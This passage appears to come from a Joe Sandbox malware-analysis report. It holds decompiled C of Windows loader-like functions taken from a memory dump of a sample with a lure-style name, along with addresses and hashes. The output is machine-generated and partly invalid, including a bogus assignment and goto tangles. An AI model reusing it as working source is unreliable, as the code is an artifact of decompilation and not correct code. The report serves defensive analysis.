                                                  																			}
                                                  																			__eflags = _t217 - 1;
                                                  																			if(_t217 != 1) {
                                                  																				_t369 = 0;
                                                  																				_t218 = _v40;
                                                  																				goto L91;
                                                  																			} else {
                                                  																				_v64 = 0;
                                                  																				E017BE9C0(1, _t290, 0, 0,  &_v64);
                                                  																				_t309 = _v64;
                                                  																				_v108 = _t309;
                                                  																				__eflags = _t309;
                                                  																				if(_t309 == 0) {
                                                  																					goto L143;
                                                  																				} else {
                                                  																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                  																					__eflags = _t226 - 0x10b;
                                                  																					if(_t226 != 0x10b) {
                                                  																						__eflags = _t226 - 0x20b;
                                                  																						if(_t226 != 0x20b) {
                                                  																							goto L143;
                                                  																						} else {
                                                  																							_t371 =  *(_t309 + 0x98);
                                                  																							goto L83;
                                                  																						}
                                                  																					} else {
                                                  																						_t371 =  *(_t309 + 0x88);
                                                  																						L83:
                                                  																						__eflags = _t371;
                                                  																						if(_t371 != 0) {
                                                  																							_v80 = _t371 - _t356 + _t290;
                                                  																							_t310 = _v64;
                                                  																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                  																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                  																							_t311 = 0;
                                                  																							__eflags = 0;
                                                  																							while(1) {
                                                  																								_v120 = _t311;
                                                  																								_v116 = _t348;
                                                  																								__eflags = _t311 - _t292;
                                                  																								if(_t311 >= _t292) {
                                                  																									goto L143;
                                                  																								}
                                                  																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                  																								__eflags = _t371 - _t359;
                                                  																								if(_t371 < _t359) {
                                                  																									L98:
                                                  																									_t348 = _t348 + 0x28;
                                                  																									_t311 = _t311 + 1;
                                                  																									continue;
                                                  																								} else {
                                                  																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                  																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                  																										goto L98;
                                                  																									} else {
                                                  																										__eflags = _t348;
                                                  																										if(_t348 == 0) {
                                                  																											goto L143;
                                                  																										} else {
                                                  																											_t218 = _v40;
                                                  																											_t312 =  *_t218;
                                                  																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                  																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                  																												_v100 = _t359;
                                                  																												_t360 = _v108;
                                                  																												_t372 = L017B8F44(_v108, _t312);
                                                  																												__eflags = _t372;
                                                  																												if(_t372 == 0) {
                                                  																													goto L143;
                                                  																												} else {
                                                  																													_t290 = _v52;
                                                  																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E017E3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                  																													_t307 = _v72;
                                                  																													_t344 = _v76;
                                                  																													_t218 = _v40;
                                                  																													goto L91;
                                                  																												}
                                                  																											} else {
                                                  																												_t290 = _v52;
                                                  																												_t307 = _v72;
                                                  																												_t344 = _v76;
                                                  																												_t369 = _v80;
                                                  																												L91:
                                                  																												_t358 = _a4;
                                                  																												__eflags = _t358;
                                                  																												if(_t358 == 0) {
                                                  																													L95:
                                                  																													_t308 = _a8;
                                                  																													__eflags = _t308;
                                                  																													if(_t308 != 0) {
                                                  																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                  																													}
                                                  																													_v8 = 0xfffffffe;
                                                  																													_t211 = _v84;
                                                  																												} else {
                                                  																													_t370 =  *_t218 - _t369 + _t290;
                                                  																													 *_t358 = _t370;
                                                  																													__eflags = _t370 - _t344;
                                                  																													if(_t370 <= _t344) {
                                                  																														L149:
                                                  																														 *_t358 = 0;
                                                  																														goto L150;
                                                  																													} else {
                                                  																														__eflags = _t307;
                                                  																														if(_t307 == 0) {
                                                  																															goto L95;
                                                  																														} else {
                                                  																															__eflags = _t370 - _t344 + _t307;
                                                  																															if(_t370 >= _t344 + _t307) {
                                                  																																goto L149;
                                                  																															} else {
                                                  																																goto L95;
                                                  																															}
                                                  																														}
                                                  																													}
                                                  																												}
                                                  																											}
                                                  																										}
                                                  																									}
                                                  																								}
                                                  																								goto L97;
                                                  																							}
                                                  																						}
                                                  																						goto L143;
                                                  																					}
                                                  																				}
                                                  																			}
                                                  																		} else {
                                                  																			__eflags = _v40 - _t307 + _t344;
                                                  																			if(_v40 >= _t307 + _t344) {
                                                  																				goto L150;
                                                  																			} else {
                                                  																				goto L75;
                                                  																			}
                                                  																		}
                                                  																	}
                                                  																}
                                                  															}
                                                  															L97:
                                                  															 *[fs:0x0] = _v20;
                                                  															return _t211;
                                                  														}
                                                  													}
                                                  												}
                                                  											}
                                                  										} else {
                                                  											goto L46;
                                                  										}
                                                  									}
                                                  								}
                                                  								goto L151;
                                                  							}
                                                  							_t288 = _v164;
                                                  							_t366 = 0xc0000135;
                                                  							goto L41;
                                                  						}
                                                  					}
                                                  				}
                                                  				L151:
                                                  			}
                                                  0x017bdbe5
                                                  0x017bdbe5
                                                  0x017bdbee
                                                  0x017bdbf1
                                                  0x0180b541
                                                  0x0180b544
                                                  0x00000000
                                                  0x0180b546
                                                  0x0180b546
                                                  0x00000000
                                                  0x0180b546
                                                  0x017bdbf7
                                                  0x017bdbf7
                                                  0x017bdbfd
                                                  0x017bdbfd
                                                  0x017bdbff
                                                  0x017bdc0b
                                                  0x017bdc15
                                                  0x017bdc1b
                                                  0x017bdc1d
                                                  0x017bdc21
                                                  0x017bdc21
                                                  0x017bdc23
                                                  0x017bdc23
                                                  0x017bdc26
                                                  0x017bdc29
                                                  0x017bdc2b
                                                  0x00000000
                                                  0x00000000
                                                  0x017bdc31
                                                  0x017bdc34
                                                  0x017bdc36
                                                  0x017bdcbf
                                                  0x017bdcbf
                                                  0x017bdcc2
                                                  0x00000000
                                                  0x017bdc3c
                                                  0x017bdc41
                                                  0x017bdc43
                                                  0x00000000
                                                  0x017bdc45
                                                  0x017bdc45
                                                  0x017bdc47
                                                  0x00000000
                                                  0x017bdc4d
                                                  0x017bdc4d
                                                  0x017bdc50
                                                  0x017bdc52
                                                  0x017bdc55
                                                  0x017bdcfa
                                                  0x017bdcfe
                                                  0x017bdd08
                                                  0x017bdd0a
                                                  0x017bdd0c
                                                  0x00000000
                                                  0x017bdd12
                                                  0x017bdd15
                                                  0x017bdd2d
                                                  0x017bdd2f
                                                  0x017bdd32
                                                  0x017bdd35
                                                  0x00000000
                                                  0x017bdd35
                                                  0x017bdc5b
                                                  0x017bdc5b
                                                  0x017bdc5e
                                                  0x017bdc61
                                                  0x017bdc64
                                                  0x017bdc67
                                                  0x017bdc67
                                                  0x017bdc6a
                                                  0x017bdc6c
                                                  0x017bdc8e
                                                  0x017bdc8e
                                                  0x017bdc91
                                                  0x017bdc93
                                                  0x017bdcce
                                                  0x017bdcce
                                                  0x017bdc95
                                                  0x017bdc9c
                                                  0x017bdc6e
                                                  0x017bdc72
                                                  0x017bdc75
                                                  0x017bdc77
                                                  0x017bdc79
                                                  0x0180b551
                                                  0x0180b551
                                                  0x00000000
                                                  0x017bdc7f
                                                  0x017bdc7f
                                                  0x017bdc81
                                                  0x00000000
                                                  0x017bdc83
                                                  0x017bdc86
                                                  0x017bdc88
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017bdc88
                                                  0x017bdc81
                                                  0x017bdc79
                                                  0x017bdc6c
                                                  0x017bdc55
                                                  0x017bdc47
                                                  0x017bdc43
                                                  0x00000000
                                                  0x017bdc36
                                                  0x017bdc23
                                                  0x00000000
                                                  0x017bdbff
                                                  0x017bdbf1
                                                  0x017bdbdf
                                                  0x017bdb8f
                                                  0x017bdb92
                                                  0x017bdb95
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017bdb95
                                                  0x017bdb8d
                                                  0x017bdb85
                                                  0x017bdb74
                                                  0x017bdc9f
                                                  0x017bdca2
                                                  0x017bdcb0
                                                  0x017bdcb0
                                                  0x017bdad1
                                                  0x0180b4e5
                                                  0x0180b4c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017bd831
                                                  0x017bd80d
                                                  0x00000000
                                                  0x017bd800
                                                  0x0180b47f
                                                  0x0180b485
                                                  0x00000000
                                                  0x0180b485
                                                  0x017bd665
                                                  0x017bd652
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: f96402bd130d42d4970fa4d830342f8dcfb1fd8588a2c5caf1a7d82d4ff9578b
                                                  • Instruction ID: e1bf17bccc9874c7fef4ac2bd7a228d4c10e0922a250a37d393fce44a5bd6ac9
                                                  • Opcode Fuzzy Hash: f96402bd130d42d4970fa4d830342f8dcfb1fd8588a2c5caf1a7d82d4ff9578b
                                                  • Instruction Fuzzy Hash: 00E1C034A0065A8FEB35CF68C8C4BE9FBB2BF45318F0901E9D90997295D774AA81CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 67%
                                                  			E017D513A(intOrPtr __ecx, void* __edx) {
                                                  				signed int _v8;
                                                  				signed char _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				char _v28;
                                                  				signed int _v32;
                                                  				signed int _v36;
                                                  				signed int _v40;
                                                  				intOrPtr _v44;
                                                  				intOrPtr _v48;
                                                  				char _v63;
                                                  				char _v64;
                                                  				signed int _v72;
                                                  				signed int _v76;
                                                  				signed int _v80;
                                                  				signed int _v84;
                                                  				signed int _v88;
                                                  				signed char* _v92;
                                                  				signed int _v100;
                                                  				signed int _v104;
                                                  				char _v105;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t157;
                                                  				signed int _t159;
                                                  				signed int _t160;
                                                  				unsigned int* _t161;
                                                  				intOrPtr _t165;
                                                  				signed int _t172;
                                                  				signed char* _t181;
                                                  				intOrPtr _t189;
                                                  				intOrPtr* _t200;
                                                  				signed int _t202;
                                                  				signed int _t203;
                                                  				char _t204;
                                                  				signed int _t207;
                                                  				signed int _t208;
                                                  				void* _t209;
                                                  				intOrPtr _t210;
                                                  				signed int _t212;
                                                  				signed int _t214;
                                                  				signed int _t221;
                                                  				signed int _t222;
                                                  				signed int _t226;
                                                  				intOrPtr* _t232;
                                                  				signed int _t233;
                                                  				signed int _t234;
                                                  				intOrPtr _t237;
                                                  				intOrPtr _t238;
                                                  				intOrPtr _t240;
                                                  				void* _t245;
                                                  				signed int _t246;
                                                  				signed int _t247;
                                                  				void* _t248;
                                                  				void* _t251;
                                                  				void* _t252;
                                                  				signed int _t253;
                                                  				signed int _t255;
                                                  				signed int _t256;
                                                  
                                                  				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                  				_v8 =  *0x189d360 ^ _t255;
                                                  				_v32 = _v32 & 0x00000000;
                                                  				_t251 = __edx;
                                                  				_t237 = __ecx;
                                                  				_t212 = 6;
                                                  				_t245 =  &_v84;
                                                  				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                  				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                  				_v48 = __ecx;
                                                  				_v36 = _t207;
                                                  				_t157 = memset(_t245, 0, _t212 << 2);
                                                  				_t256 = _t255 + 0xc;
                                                  				_t246 = _t245 + _t212;
                                                  				if(_t207 == 2) {
                                                  					_t247 =  *(_t237 + 0x60);
                                                  					_t208 =  *(_t237 + 0x64);
                                                  					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                  					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                  					_v104 = _t159;
                                                  					_v76 = _t159;
                                                  					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                  					_v100 = _t160;
                                                  					_v72 = _t160;
                                                  					L19:
                                                  					_v80 = _t208;
                                                  					_v84 = _t247;
                                                  					L8:
                                                  					_t214 = 0;
                                                  					if( *(_t237 + 0x74) > 0) {
                                                  						_t82 = _t237 + 0x84; // 0x124
                                                  						_t161 = _t82;
                                                  						_v92 = _t161;
                                                  						while( *_t161 >> 0x1f != 0) {
                                                  							_t200 = _v92;
                                                  							if( *_t200 == 0x80000000) {
                                                  								break;
                                                  							}
                                                  							_t214 = _t214 + 1;
                                                  							_t161 = _t200 + 0x10;
                                                  							_v92 = _t161;
                                                  							if(_t214 <  *(_t237 + 0x74)) {
                                                  								continue;
                                                  							}
                                                  							goto L9;
                                                  						}
                                                  						_v88 = _t214 << 4;
                                                  						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                  						_t165 = 0;
                                                  						asm("adc eax, [ecx+edx+0x7c]");
                                                  						_v24 = _t165;
                                                  						_v28 = _v40;
                                                  						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                  						_t221 = _v40;
                                                  						_v16 =  *_v92;
                                                  						_v32 =  &_v28;
                                                  						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                  							goto L9;
                                                  						}
                                                  						_t240 = _v48;
                                                  						if( *_v92 != 0x80000000) {
                                                  							goto L9;
                                                  						}
                                                  						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                  						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                  						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                  						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                  						_t226 = 0;
                                                  						_t181 = _t251 + 0x66;
                                                  						_v88 = 0;
                                                  						_v92 = _t181;
                                                  						do {
                                                  							if( *((char*)(_t181 - 2)) == 0) {
                                                  								goto L31;
                                                  							}
                                                  							_t226 = _v88;
                                                  							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                  								_t181 = E017ED0F0(1, _t226 + 0x20, 0);
                                                  								_t226 = _v40;
                                                  								 *(_t226 + 8) = _t181;
                                                  								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                  								L34:
                                                  								if(_v44 == 0) {
                                                  									goto L9;
                                                  								}
                                                  								_t210 = _v44;
                                                  								_t127 = _t210 + 0x1c; // 0x1c
                                                  								_t249 = _t127;
                                                  								E017C2280(_t181, _t127);
                                                  								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                  								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                  								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                  									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                  								}
                                                  								_t189 = L017C4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                  								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                  								if(_t189 != 0) {
                                                  									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                  									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                  									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                  									 *_t232 = _t232 + 0x10;
                                                  									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                  									E017EF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                  									_t256 = _t256 + 0xc;
                                                  								}
                                                  								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                  								E017BFFB0(_t210, _t249, _t249);
                                                  								_t222 = _v76;
                                                  								_t172 = _v80;
                                                  								_t208 = _v84;
                                                  								_t247 = _v88;
                                                  								L10:
                                                  								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                  								_v44 = _t238;
                                                  								if(_t238 != 0) {
                                                  									 *0x189b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                  									_v44();
                                                  								}
                                                  								_pop(_t248);
                                                  								_pop(_t252);
                                                  								_pop(_t209);
                                                  								return E017EB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                  							}
                                                  							_t181 = _v92;
                                                  							L31:
                                                  							_t226 = _t226 + 1;
                                                  							_t181 =  &(_t181[0x18]);
                                                  							_v88 = _t226;
                                                  							_v92 = _t181;
                                                  						} while (_t226 < 4);
                                                  						goto L34;
                                                  					}
                                                  					L9:
                                                  					_t172 = _v104;
                                                  					_t222 = _v100;
                                                  					goto L10;
                                                  				}
                                                  				_t247 = _t246 | 0xffffffff;
                                                  				_t208 = _t247;
                                                  				_v84 = _t247;
                                                  				_v80 = _t208;
                                                  				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                  					_t233 = _v72;
                                                  					_v105 = _v64;
                                                  					_t202 = _v76;
                                                  				} else {
                                                  					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                  					_v105 = 1;
                                                  					if(_v63 <= _t204) {
                                                  						_v63 = _t204;
                                                  					}
                                                  					_t202 = _v76 |  *(_t251 + 0x40);
                                                  					_t233 = _v72 |  *(_t251 + 0x44);
                                                  					_t247 =  *(_t251 + 0x38);
                                                  					_t208 =  *(_t251 + 0x3c);
                                                  					_v76 = _t202;
                                                  					_v72 = _t233;
                                                  					_v84 = _t247;
                                                  					_v80 = _t208;
                                                  				}
                                                  				_v104 = _t202;
                                                  				_v100 = _t233;
                                                  				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                  					_t237 = _v48;
                                                  					_v105 = 1;
                                                  					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                  						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                  						_t237 = _v48;
                                                  					}
                                                  					_t203 = _t202 |  *(_t251 + 0xb8);
                                                  					_t234 = _t233 |  *(_t251 + 0xbc);
                                                  					_t247 = _t247 &  *(_t251 + 0xb0);
                                                  					_t208 = _t208 &  *(_t251 + 0xb4);
                                                  					_v104 = _t203;
                                                  					_v76 = _t203;
                                                  					_v100 = _t234;
                                                  					_v72 = _t234;
                                                  					_v84 = _t247;
                                                  					_v80 = _t208;
                                                  				}
                                                  				if(_v105 == 0) {
                                                  					_v36 = _v36 & 0x00000000;
                                                  					_t208 = 0;
                                                  					_t247 = 0;
                                                  					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                  					goto L19;
                                                  				} else {
                                                  					_v36 = 1;
                                                  					goto L8;
                                                  				}
                                                  			}

                                                  0x00000000
                                                  0x00000000
                                                  0x01816e52
                                                  0x01816e53
                                                  0x01816e56
                                                  0x01816e5d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01816e5f
                                                  0x01816e67
                                                  0x01816e77
                                                  0x01816e7f
                                                  0x01816e80
                                                  0x01816e88
                                                  0x01816e90
                                                  0x01816e9f
                                                  0x01816ea5
                                                  0x01816ea9
                                                  0x01816eb1
                                                  0x01816ebf
                                                  0x00000000
                                                  0x00000000
                                                  0x01816ecf
                                                  0x01816ed3
                                                  0x00000000
                                                  0x00000000
                                                  0x01816edb
                                                  0x01816ede
                                                  0x01816ee1
                                                  0x01816ee8
                                                  0x01816eeb
                                                  0x01816eed
                                                  0x01816ef0
                                                  0x01816ef4
                                                  0x01816ef8
                                                  0x01816efc
                                                  0x00000000
                                                  0x00000000
                                                  0x01816f0d
                                                  0x01816f11
                                                  0x01816f32
                                                  0x01816f37
                                                  0x01816f3b
                                                  0x01816f3e
                                                  0x01816f41
                                                  0x01816f46
                                                  0x00000000
                                                  0x00000000
                                                  0x01816f4c
                                                  0x01816f50
                                                  0x01816f50
                                                  0x01816f54
                                                  0x01816f62
                                                  0x01816f65
                                                  0x01816f6d
                                                  0x01816f7b
                                                  0x01816f7b
                                                  0x01816f93
                                                  0x01816f98
                                                  0x01816fa0
                                                  0x01816fa6
                                                  0x01816fb3
                                                  0x01816fb6
                                                  0x01816fbf
                                                  0x01816fc1
                                                  0x01816fd5
                                                  0x01816fda
                                                  0x01816fda
                                                  0x01816fdd
                                                  0x01816fe2
                                                  0x01816fe7
                                                  0x01816feb
                                                  0x01816fef
                                                  0x01816ff3
                                                  0x017d520c
                                                  0x017d520c
                                                  0x017d520f
                                                  0x017d5215
                                                  0x017d5234
                                                  0x017d523a
                                                  0x017d523a
                                                  0x017d5244
                                                  0x017d5245
                                                  0x017d5246
                                                  0x017d5251
                                                  0x017d5251
                                                  0x01816f13
                                                  0x01816f17
                                                  0x01816f17
                                                  0x01816f18
                                                  0x01816f1b
                                                  0x01816f1f
                                                  0x01816f23
                                                  0x00000000
                                                  0x01816f28
                                                  0x017d5204
                                                  0x017d5204
                                                  0x017d5208
                                                  0x00000000
                                                  0x017d5208
                                                  0x017d5185
                                                  0x017d5188
                                                  0x017d518a
                                                  0x017d518e
                                                  0x017d5195
                                                  0x01816db1
                                                  0x01816db5
                                                  0x01816db9
                                                  0x017d519b
                                                  0x017d519b
                                                  0x017d519e
                                                  0x017d51a7
                                                  0x017d51a9
                                                  0x017d51a9
                                                  0x017d51b5
                                                  0x017d51b8
                                                  0x017d51bb
                                                  0x017d51be
                                                  0x017d51c1
                                                  0x017d51c5
                                                  0x017d51c9
                                                  0x017d51cd
                                                  0x017d51cd
                                                  0x017d51d8
                                                  0x017d51dc
                                                  0x017d51e0
                                                  0x01816dcc
                                                  0x01816dd0
                                                  0x01816dd5
                                                  0x01816ddd
                                                  0x01816de1
                                                  0x01816de1
                                                  0x01816de5
                                                  0x01816deb
                                                  0x01816df1
                                                  0x01816df7
                                                  0x01816dfd
                                                  0x01816e01
                                                  0x01816e05
                                                  0x01816e09
                                                  0x01816e0d
                                                  0x01816e11
                                                  0x01816e11
                                                  0x017d51eb
                                                  0x01816e1a
                                                  0x01816e1f
                                                  0x01816e21
                                                  0x01816e23
                                                  0x00000000
                                                  0x017d51f1
                                                  0x017d51f1
                                                  0x00000000
                                                  0x017d51f1

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 439d45aac7ed6c0c8959c8ddbf5e13d5b9a30add7e08ce1cf6de158eb59ba5a0
                                                  • Instruction ID: 0fc6d83305f75b0dc490ae32201a41e7001edc539a481c5661913f5641e2e6d4
                                                  • Opcode Fuzzy Hash: 439d45aac7ed6c0c8959c8ddbf5e13d5b9a30add7e08ce1cf6de158eb59ba5a0
                                                  • Instruction Fuzzy Hash: 25C1F0B55093818FD354CF28C580A5AFBF1BF88304F284A6EF9999B352D771E985CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E017D03E2(signed int __ecx, signed int __edx) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				signed int _v36;
                                                  				intOrPtr _v40;
                                                  				signed int _v44;
                                                  				signed int _v48;
                                                  				char _v52;
                                                  				char _v56;
                                                  				char _v64;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t56;
                                                  				signed int _t58;
                                                  				char* _t64;
                                                  				intOrPtr _t65;
                                                  				signed int _t74;
                                                  				signed int _t79;
                                                  				char* _t83;
                                                  				intOrPtr _t84;
                                                  				signed int _t93;
                                                  				signed int _t94;
                                                  				signed char* _t95;
                                                  				signed int _t99;
                                                  				signed int _t100;
                                                  				signed char* _t101;
                                                  				signed int _t105;
                                                  				signed int _t119;
                                                  				signed int _t120;
                                                  				void* _t122;
                                                  				signed int _t123;
                                                  				signed int _t127;
                                                  
                                                  				_v8 =  *0x189d360 ^ _t127;
                                                  				_t119 = __ecx;
                                                  				_t105 = __edx;
                                                  				_t118 = 0;
                                                  				_v20 = __edx;
                                                  				_t120 =  *(__ecx + 0x20);
                                                  				if(E017D0548(__ecx, 0) != 0) {
                                                  					_t56 = 0xc000022d;
                                                  					L23:
                                                  					return E017EB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                  				} else {
                                                  					_v12 = _v12 | 0xffffffff;
                                                  					_t58 = _t120 + 0x24;
                                                  					_t109 =  *(_t120 + 0x18);
                                                  					_t118 = _t58;
                                                  					_v16 = _t58;
                                                  					E017BB02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                  					_v52 = 0x18;
                                                  					_v48 = 0;
                                                  					0x840 = 0x40;
                                                  					if( *0x1897c1c != 0) {
                                                  					}
                                                  					_v40 = 0x840;
                                                  					_v44 = _t105;
                                                  					_v36 = 0;
                                                  					_v32 = 0;
                                                  					if(E017C7D50() != 0) {
                                                  						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                  					} else {
                                                  						_t64 = 0x7ffe0384;
                                                  					}
                                                  					if( *_t64 != 0) {
                                                  						_t65 =  *[fs:0x30];
                                                  						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                  						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                  							_t100 = E017C7D50();
                                                  							__eflags = _t100;
                                                  							if(_t100 == 0) {
                                                  								_t101 = 0x7ffe0385;
                                                  							} else {
                                                  								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                  							}
                                                  							__eflags =  *_t101 & 0x00000020;
                                                  							if(( *_t101 & 0x00000020) != 0) {
                                                  								_t118 = _t118 | 0xffffffff;
                                                  								_t109 = 0x1485;
                                                  								E01827016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                  							}
                                                  						}
                                                  					}
                                                  					_t105 = 0;
                                                  					while(1) {
                                                  						_push(0x60);
                                                  						_push(5);
                                                  						_push( &_v64);
                                                  						_push( &_v52);
                                                  						_push(0x100021);
                                                  						_push( &_v12);
                                                  						_t122 = E017E9830();
                                                  						if(_t122 >= 0) {
                                                  							break;
                                                  						}
                                                  						__eflags = _t122 - 0xc0000034;
                                                  						if(_t122 == 0xc0000034) {
                                                  							L38:
                                                  							_t120 = 0xc0000135;
                                                  							break;
                                                  						}
                                                  						__eflags = _t122 - 0xc000003a;
                                                  						if(_t122 == 0xc000003a) {
                                                  							goto L38;
                                                  						}
                                                  						__eflags = _t122 - 0xc0000022;
                                                  						if(_t122 != 0xc0000022) {
                                                  							break;
                                                  						}
                                                  						__eflags = _t105;
                                                  						if(__eflags != 0) {
                                                  							break;
                                                  						}
                                                  						_t109 = _t119;
                                                  						_t99 = E018269A6(_t119, __eflags);
                                                  						__eflags = _t99;
                                                  						if(_t99 == 0) {
                                                  							break;
                                                  						}
                                                  						_t105 = _t105 + 1;
                                                  					}
                                                  					if( !_t120 >= 0) {
                                                  						L22:
                                                  						_t56 = _t120;
                                                  						goto L23;
                                                  					}
                                                  					if( *0x1897c04 != 0) {
                                                  						_t118 = _v12;
                                                  						_t120 = E0182A7AC(_t119, _t118, _t109);
                                                  						__eflags = _t120;
                                                  						if(_t120 >= 0) {
                                                  							goto L10;
                                                  						}
                                                  						__eflags =  *0x1897bd8;
                                                  						if( *0x1897bd8 != 0) {
                                                  							L20:
                                                  							if(_v12 != 0xffffffff) {
                                                  								_push(_v12);
                                                  								E017E95D0();
                                                  							}
                                                  							goto L22;
                                                  						}
                                                  					}
                                                  					L10:
                                                  					_push(_v12);
                                                  					_t105 = _t119 + 0xc;
                                                  					_push(0x1000000);
                                                  					_push(0x10);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0xf);
                                                  					_push(_t105);
                                                  					_t120 = E017E99A0();
                                                  					if(_t120 < 0) {
                                                  						__eflags = _t120 - 0xc000047e;
                                                  						if(_t120 == 0xc000047e) {
                                                  							L51:
                                                  							_t74 = E01823540(_t120);
                                                  							_t119 = _v16;
                                                  							_t120 = _t74;
                                                  							L52:
                                                  							_t118 = 0x1485;
                                                  							E017AB1E1(_t120, 0x1485, 0, _t119);
                                                  							goto L20;
                                                  						}
                                                  						__eflags = _t120 - 0xc000047f;
                                                  						if(_t120 == 0xc000047f) {
                                                  							goto L51;
                                                  						}
                                                  						__eflags = _t120 - 0xc0000462;
                                                  						if(_t120 == 0xc0000462) {
                                                  							goto L51;
                                                  						}
                                                  						_t119 = _v16;
                                                  						__eflags = _t120 - 0xc0000017;
                                                  						if(_t120 != 0xc0000017) {
                                                  							__eflags = _t120 - 0xc000009a;
                                                  							if(_t120 != 0xc000009a) {
                                                  								__eflags = _t120 - 0xc000012d;
                                                  								if(_t120 != 0xc000012d) {
                                                  									_v28 = _t119;
                                                  									_push( &_v56);
                                                  									_push(1);
                                                  									_v24 = _t120;
                                                  									_push( &_v28);
                                                  									_push(1);
                                                  									_push(2);
                                                  									_push(0xc000007b);
                                                  									_t79 = E017EAAF0();
                                                  									__eflags = _t79;
                                                  									if(_t79 >= 0) {
                                                  										__eflags =  *0x1898474 - 3;
                                                  										if( *0x1898474 != 3) {
